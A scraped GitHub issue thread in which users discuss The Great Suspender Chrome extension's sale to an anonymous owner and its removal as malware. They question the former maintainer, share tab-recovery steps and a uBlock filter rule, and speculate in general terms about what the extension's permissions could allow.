class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">15</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>_Can you categorically say that there was no malicious intent and that no data not explicitly required for the extension to operate was taken/used from peoples machines?_</p> <p>I cannot categorically say anything. As I said, this is my personal intuition based on conversations I have had with the maintainers. I cannot provide those answers sorry.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1051763?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="deanoemcke picture"> <strong>deanoemcke</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 😕<span class="ml-2 mr-3">14</span> 👀<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>The fact that this was sold off at all is certainly troubling, though without more context I won't judge <strong>@deanoemcke</strong> too harshly<br /> Agreed - he wrote and distributed it, and closed over 800 tickets over half a decade, for free. GH issues aren't really a great venue for editorializing, but I posted <a rel="nofollow noopener" target="_blank" href="https://nfultz.github.io/notes/chrome-tgs.html">an op-ed on my site</a> about this.</p> </blockquote> </blockquote> <p>I've been publishing and maintaining my extensions for over 10 years. At one point I had 1M+ users of one of them. I believe I can very much get into the head of <strong>@deanoemcke</strong> and relate. The work is never-ending, complex, and thankless. Sure, some users donate, but it won't make you rich. Although you're doing it "for the community", you are nevertheless very aware of the kind of revenue that you could generate by simply tracking a million users, or perhaps inserting ads. The offers come frequently, not just to buy your extension, but to monetize it with adware, malware, installers, etc.</p> <p>If you get to the point where you're just sick of doing it and you want to "cash out", then doing exactly what he did is a very appealing option. Take the cash and disappear. Cover your tracks a bit. You cannot tell me he didn't know exactly what he was doing, because every extension author that reaches some level of success starts thinking about the possibility of an exit strategy. Trust me, I've been here for over a decade. I know how this works and I have explored every possible option. We just hope that most of us have enough integrity to not sell out their users.</p> <blockquote> <p>FWIW, I have trust in the current maintainer and believe their actions and intent were never malicious.</p> </blockquote> <p>I am highly suspicious of this statement. You knew exactly what you had and what is was worth to whom. If this statement is to be believed, I would like to know what due diligence you did in researching the "buyer", and why they remained anonymous. I would like to know what you sold it for, and how the transaction was made (anonymous BTC, perhaps?). I would like to know if you drew up a legal agreement with the "buyer" before the transaction, and if it contained any wording about what they were and were not allowed to do after the sale. I would like to know if you had any transition period where you retained partial control to prevent hijacking. I would like to know if you considered informing users in a more obvious manner about the sale so they could beware, because surely you understood the risk you were making them take.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2974436?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="matt-kruse picture"> <strong>matt-kruse</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">54</span> ❤<span class="ml-2 mr-3">6</span> 🚀<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@vttale</strong> If you use session buddy, follow the following steps to restore all tabs, windows, incognito and other settings session buddy normally would restore:</p> <ol> <li>Open session buddy.</li> <li>Click Settings > Back Up.</li> <li>This will generate a file with <em>every</em> session you've ever saved.</li> <li>Open the file in a text editor, and in the list under "sessions", search for your saved session name.</li> <li>You'll have to delete all other sessions from the session list except that session. Collapse the session(s) you want to save if your text editor supports it to make deleting other sessions easier.</li> <li>Find and replace every instance of <code>chrome-extension.*uri=</code> with nothing.</li> <li>Go back to session buddy and Settings > Import and select the edited file.</li> </ol> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/28830748?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="onplanetnowhere picture"> <strong>onplanetnowhere</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@matt-kruse I think you've hit the nail on the head there 😂 </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/62667610?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TrainerGamer picture"> <strong>TrainerGamer</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>If you get to the point where you're just sick of doing it and you want to "cash out", then doing exactly what he did is a very appealing option. Take the cash and disappear. Cover your tracks a bit. You cannot tell me he didn't know exactly what he was doing, because every extension author that reaches some level of success starts thinking about the possibility of an exit strategy.</p> </blockquote> <p>Totally agree.</p> <p>If a million people switch over to a fork, won't the same thing just happen again? Why should anyone expect it to go any differently next time? I guess I just don't see any good solution here.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/418638?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="nfultz picture"> <strong>nfultz</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@ne0phyte</strong> Your comment got a bit buried by <strong>@deanoemcke</strong>'s arrival, but I want to help and point out a few things I think you missed. The downloaded remote javascript IS NOT Open Web Analytics: there are detailed analyses of the loaded script further up, but the TLDR is that the script where most of the malice is being conducted is not the open web analytics script: there are completely different back-ends being communicated with. I believe I link to them in my summary: look for posts in mid-january.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> who is in control of this GitHub repository right now, is it you or the new owner(s) or both of you?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/91866?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="sbusch picture"> <strong>sbusch</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@ne0phyte</strong> Your comment got a bit buried by <strong>@deanoemcke</strong>'s arrival, but I want to help and point out a few things I think you missed. The downloaded remote javascript IS NOT Open Web Analytics: there are detailed analyses of the loaded script further up, but the TLDR is that the script where most of the malice is being conducted is not the open web analytics script: there are completely different back-ends being communicated with. I believe I link to them in my summary: look for posts in mid-january.</p> </blockquote> <p>What's the source of this script? What did this script do?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2878052?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="itsaphel picture"> <strong>itsaphel</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@nfultz</strong> nice op-ed, IMO. One important addition to your "peer review" proposal could be guaranteed reproducible builds or publishing of trusted builds done by an independent 3rd party (Google itself?) only</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/91866?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="sbusch picture"> <strong>sbusch</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@ne0phyte</strong> Your comment got a bit buried by <strong>@deanoemcke</strong>'s arrival, but I want to help and point out a few things I think you missed. The downloaded remote javascript IS NOT Open Web Analytics: there are detailed analyses of the loaded script further up, but the TLDR is that the script where most of the malice is being conducted is not the open web analytics script: there are completely different back-ends being communicated with. I believe I link to them in my summary: look for posts in mid-january.</p> </blockquote> <p>I suppose you refer to this: <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-754354645</p> <p>That does look like something entirely different and I only checked the version of the script wayback machine captured. It may as well have served something else conditionally.<br /> I will update my comment to reflect that, just to be sure not to mislead anyone.</p> <p>Provided that TGS really just initalized that slightly different <code>owa.tracker-combined-latest.minified.js</code> it looks like it didn't capture any keypresses, though (which is what I was looking for). </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1471525?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="ne0phyte picture"> <strong>ne0phyte</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> appreciate you might want to move on to other ventures but your personal opinion of the new maintainers doesn’t really amount to much.</p> <ol> <li>We have analysis of the TGS tracking code additions, that show it’s the exact same tracking code as other extensions on the store. Fine. <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-754354645</li> <li>There’s been reports of malware in those extensions (injecting ads). <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment</a>-754354645</li> <li>One of those extensions was also removed from the store in a previous version. On analysis, that removed version contained code to do affiliate links fraud (https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-754683847)</li> </ol> <p>Now we want to hear from the new maintainer(s) on what direction they want to take with TGS. Presumably they didn’t purchase an extension out of the goodness of their heart. What’s their plan for monetization? Is it ads, donations, or malware?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/877585?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="thibaudcolas picture"> <strong>thibaudcolas</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">25</span> 👀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Owa seems to be capable of tracking clicks, key presses, mouse movements and all kinds of actions but <strong>to me it looks like it "only" captured the visited site urls.</strong></p> </blockquote> <p>The biggest DEFINITE security flaw I've seen to date is anyone who had not opted out all of the query parameters were likely sent with the URL (haven't seen the full code of the affected version), but this is typically a similar issue with Google Analytics as well. But this typically "shouldn't" contain super privileged information anyway.</p> <p>Unfortunately, due to the non-standard analytics package this domain doesn't appear to be filtered on most of the common filterlists. ( I just queried all the uBlock Origin compatible English-language filterlists and none of the 150'ish lists block only 3 out of the 150 lists contain a network block for this domain. </p> <p>uBO users can add the following to their My Filters just to be sure nothing else goes to that domain if it makes you feel any more secure...<br /> ||cdn.owebanalytics.com^ </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">9</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@ne0phyte</strong> Since the code runs in the extension's background script, the clicks/keypresses and urls it can track are in no way related to the user's tabs. Even if this tracking option was enabled, it would have no clicks since this is not a visible page, and the URL will probably be some <code>extension://...</code>.<br /> But, if this script is indeed sometimes replaced with another script (maybe based on IP), it can use the extension API (the global <code>chrome</code> object) to register content scripts which will actually execute on the tabs themselves. Still I don't think this has access to clicks or keypresses, but it can probably do other malicious things (not sure what exactly).</p> <p>Since the OpenWebAnalysis script does not use extension APIs (it wasn't meant to be used in an extension), and doesn't have any <code>eval</code>s, it can't do anything IMO. The problem is the script being replaced.</p> <p>So looking at the extension's permissions, the genuine concerns are dumping the user's browser history, or sending requests to any site (such as Facebook) on behalf of the user (for example to like a page, post something, or get the authentication cookie to be able to log-in as that person), or swapping the response of an EXE the user tries to download with a malicious EXE, thus escaping the browser and taking over the computer.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Dumb question: does repo change of ownership trigger a broadcast notification to maintainers, dependent repos, users watchers and users who starred the repo?</p> <p>A notification should be sent out as a potential security risk alert.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4752832?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dienluong picture"> <strong>dienluong</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>For anyone with a <em>lot</em> of suspended tabs in multiple windows, that got automatically closed when the extension got disabled (thanks Chrome!) and not wanting to go hunting in the history there is a easy fix:</p> <ul> <li>close chrome completely</li> <li>open Chrome again -> the extension will be active again and it will take a minute or so for Chrome to disable it again</li> <li>open The Great Suspender options</li> <li>go to Session management</li> <li>choose the session with all the tabs you want and click "open and load"</li> <li>wait for all the windows and tabs to load</li> <li>Now you can safely remove the extension and keep your tabs</li> </ul> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4622029?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="raphaeldavidf picture"> <strong>raphaeldavidf</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@dienluong</strong> how would anyone know of the ownership change? the previous owner gave the new owner the password to the GitHub account. there is no way to automatically detect this, even looking at the IP the account is logged in from won't tell much, since IPs aren't constant (i.e. switching an internet provider). the only way is for GitHub to add a button called "I am giving this account to someone else" which will alert dependents. sounds weird.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I completely agree with @matt-kruse. <strong>@deanoemcke</strong> can't categorically deny malice of the maintainers, everything he says is based on his own "intuition" and "trust" yet he repeatedly fails to provide any explanation or justification for that trust. I understand wanting to move on and find an exit strategy, but he should have found one that didn't put his users at risk. Seems to me like there was no due diligence done on his part if he can't even deny malice. In addition to the great questions @matt-kruse had, I'd also want to know, if <strong>@deanoemcke</strong> won't tell us who the maintainer is, at least he's hiding it. Is it because of an NDA like Matt pointed out?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26859964?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="IAmMarcellus picture"> <strong>IAmMarcellus</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@NotWearingPants</strong> The previous owner posted an issue notifying everyone of the ownership change: <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1175.">https://github.com/greatsuspender/thegreatsuspender/issues/1175.</a> The problem is most of the users are average people who downloaded the extension from the chrome store and have never been on github and don't even know what "open source" means so there's no way they were ever going to see that post about the change of ownership. And even if they had seen it, they wouldn't have understood the risks associated with it a change of ownership, especially to an anonymous owner.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26859964?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="IAmMarcellus picture"> <strong>IAmMarcellus</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>PS: if anyone wants to do some digging through the code... here is a CRXviewer pointed at cached version of the affected 7.1.8 extension:<br /> <a rel="nofollow noopener" target="_blank" href="https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D221789%26s%3D0%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0w4lDJ_bL6-4cEiO2dNd4wrSGFFOdFphokRztdPsQowUaOdWUtinT5tZeRv1Vf900oTts08327-tk8a_WqaBFZAMZSmuXCYMppUJZfV9giRXbSZIQVQDpezA%252Fextension_7_1_8_0.crx">https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D221789%26s%3D0%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0w4lDJ_bL6-4cEiO2dNd4wrSGFFOdFphokRztdPsQowUaOdWUtinT5tZeRv1Vf900oTts08327-tk8a_WqaBFZAMZSmuXCYMppUJZfV9giRXbSZIQVQDpezA%252Fextension_7_1_8_0.crx</a></p> <p><strong>* CAUTION: using the above CRX viewer link is safe and just brings the various files into an online editor (not parsing them or loading them at all), but please don't attempt to download and/or install the extension unless you know what the heck you're doing :) *</strong></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>If you had hundreds (thousands?) of suspended tabs saved using the <strong>OneTab</strong> extension (like I did), you can restore them quickly this way:</p> <ol> <li>From the OneTab page click on <strong>Export/Import URLs</strong></li> <li>Copy the contents in the text box under <strong>Export URLs</strong></li> <li>Paste in a code editor that supports find and replace using regular expressions</li> <li>Replace <code>chrome-extension.*uri=</code> with nothing</li> <li>Paste the resulting text in the text box under <strong>Import URLs</strong> and click Import</li> </ol> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9285264?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="M-Salti picture"> <strong>M-Salti</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@IAmMarcellus</strong> I know, and this is equivalent to a "I am giving this account to someone else" button. What I'm saying is there is no automatic solution other than the owner announcing transferal, out of his own good will and responsibility (which did happen in this case).<br /> Although, this button sounds like a useful idea, maybe GitHub and the Chrome webstore need one of these, to let the owner notify his users. This still doesn't prevent an ownership change occurring without the owner ever announcing it though.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@dienluong</strong> how would anyone know of the ownership change? the previous owner gave the new owner the password to the GitHub account. there is no way to automatically detect this, even looking at the IP the account is logged in from won't tell much, since IPs aren't constant (i.e. switching an internet provider). the only way is for GitHub to add a button called "I am giving this account to someone else" which will alert dependents. sounds weird.</p> </blockquote> <p>Let me quote the initial post:</p> <blockquote> <p>As a replacement maintainer, he chose an unknown entity, who controls the single-purpose <strong>@greatsuspender</strong> Github account.</p> </blockquote> <p>How was this detected? I assume <strong>deanoemcke</strong> told some contributors and anyone closely involved with the repo that he is transferring ownership and no longer involved with the project. So there should be a mechanism for <strong>deanoemcke</strong> or anyone in his position, to voluntarily send out such notification. Contributors would pressure such person to do that, if it comes to that. This will bring more transparency to the transfer of ownership.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4752832?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dienluong picture"> <strong>dienluong</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Anyone know what the addon stole and how? What passwords were stolen?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 😕<span class="ml-2 mr-3">3</span> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@minig0d</strong> If that's a recent copy then that makes me feel MUCH better about this. I'll be honest, after looking through the source I have yet to figure out where the monetization even is happening. </p> <ol> <li>The tracking looks like it's just there for tracking open/suspended tab counts and general extension performance. </li> <li>Looking at <code>manifest.json</code> I'm not seeing any script sources allowed from any crazy domains. In my experience with extension development, Chrome's sandboxing is pretty good about preventing script injection (often infuriatingly so), so this is great news</li> <li>Looking at the stuff using the <code>onKeyPress</code> event, I also feel <strong>much</strong> better. I had forgotten that you can disable auto-suspension if there is currently form input. From what I can see here, the only thing listening to <code>onKeyPress</code>/forms is only doing so to check if there is any form input to avoid auto-suspension.</li> </ol> <p>I know i'm just one dude out of a gazillion, but after looking through this source code I am struggling to even figure out why Chrome de-listed this from the webstore. It certainly suggests there is more to this story, though what that might be would be speculation. I would install the extension <strong>@minig0d</strong> linked above without blinking, there's just nothing wrong with it that I can see.</p> <p>I'm going to sleep a lot better having seen this source code, unless there is a more recent version available that contains a smoking gun. </p> <p>Also, I wanted to say thank you to <strong>@deanoemcke</strong> for coming in here and responding despite knowing it wasn't going to be a super-friendly crowd. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 4 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> ❤<span class="ml-2 mr-3">4</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>rtant to state here that this is purely my personal intuition - a feeling that involves trust on my part.</p> <p>As far as I am aware, the version of the extension on the chrome webstore contained none of the suspect code that caused suspicion from the community. Do you suppose Google have removed it as punishment for the previous release? Personally, the extension still seems to</p> </blockquote> <p><strong>@deanoemcke</strong> Is this really meant to be a value-add to the conversation? Some sort of demonstration of contrition? You need to take some personal responsibility for the fact that your intuition has left literally millions waking up to a malware warning, and maybe take some steps to audit what has actually taken place here - if you can't answer what data has been breached, or can't categorically state that no data has been breached, all you appear to be doing is deflecting from personal responsibility - are you suggesting that Google erred by removing the release from the web store? </p> <p>I am still sitting here unsure whether my information has been exposed, millions of users put trust in your extension which was breached. Don't ask us to trust you that this was all a happy accident and the third-party is very sad :( :( :( unless you can give some real assurance as to what has occurred here. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/8454281?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="malcolmturnbull picture"> <strong>malcolmturnbull</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> ❤<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> <strong>@greatsuspender</strong> </p> <p>I just received the following from the Chrome Web Store mailing list - it sounds like Google will require you to remove the external code if you wish to resubmit to the store.</p> <blockquote> <p>Dear Developer,</p> <p>Last year, we announced the rollout of Manifest V3 support for Chrome extensions alongside Chrome 88. These updates to the extension platform make the extension experience safer, more privacy-preserving, and more performant for Chrome users.</p> <p>One of the key changes for V3 extensions is the disallowing of remotely hosted code. Now that you can submit to the Chrome Web Store, we’ve updated our Developer Program Policies to reflect these new guidelines. Please refer to our Developer Program Policies for more details on these updates.</p> <p>Thank you for your cooperation and for your participation in the Chrome extension ecosystem!</p> <ul> <li>The Google Chrome Web Store team</li> </ul> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/418638?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="nfultz picture"> <strong>nfultz</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>As an alternative for session management, check out <a rel="nofollow noopener" target="_blank" href="https://chrome.google.com/webstore/detail/tabxpert-session-and-tab/maomempcdmkfcjgeabecfpkebghcigac">tabXpert</a>. It has a lot of cool features, including session auto-tracking, sync with the Cloud, management of sessions and bookmarks with tags, and many more. Also, it can restore sessions suspended and supports the 'Tab Suspender' extension if you want to suspend tabs on timeout. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1127024?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kiyanovsky picture"> <strong>kiyanovsky</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@deanoemcke</strong> @greatsuspender</p> <p>I just received the following from the Chrome Web Store mailing list - it sounds like Google will require you to remove the external code if you wish to resubmit to the store.</p> <blockquote> <p>Dear Developer,<br /> Last year, we announced the rollout of Manifest V3 support for Chrome extensions alongside Chrome 88. These updates to the extension platform make the extension experience safer, more privacy-preserving, and more performant for Chrome users.<br /> One of the key changes for V3 extensions is the disallowing of remotely hosted code. Now that you can submit to the Chrome Web Store, we’ve updated our Developer Program Policies to reflect these new guidelines. Please refer to our Developer Program Policies for more details on these updates.<br /> Thank you for your cooperation and for your participation in the Chrome extension ecosystem!</p> <ul> <li>The Google Chrome Web Store team</li> </ul> </blockquote> </blockquote> <p>That is not it.<br /> TGS was sold and it looked like the new maintainer was planning to add malicious code and already started.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/30575036?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="S10MC2015 picture"> <strong>S10MC2015</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 🚀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Yup this is the “infected version” where google analytics had been swapped out to that third party analytics server. I’m not at my desk right now but this version was replaced with another one which restored google analytics. I’ll link to a cached version of that one when I get back to my desk. There’s really nothing notable in the code but supposedly that analytics server was serving a js file with some questionable code I guess it was. </p> <p>I never paid attention when installing but this extension does have some pretty potentially invasive permissions allowed so it could seemingly open up some pretty huge holes combined with some nefarious code. ex the webrequests permission enables near full access to the headers on all web sites. I haven’t messed with that api yet so I don’t know if there are additional safeguards but headers contain authentication information including bearer tokens and such. Note that these permissions were not newly added in the infected version so that’s not exactly a clue or anything. </p> <p>Manifest 3 will definitely tighten some of the security concerns up but I think everyone needs to be extremely cognizant about extensions in general. </p> <blockquote> <p>On Feb 4, 2021, at 4:58 PM, ᴘɪᴇʀᴄᴇ ᴍᴏᴏʀᴇ™ <a rel="nofollow noopener" target="_blank" href="mailto:notifications@github.com">notifications@github.com</a> wrote:</p> 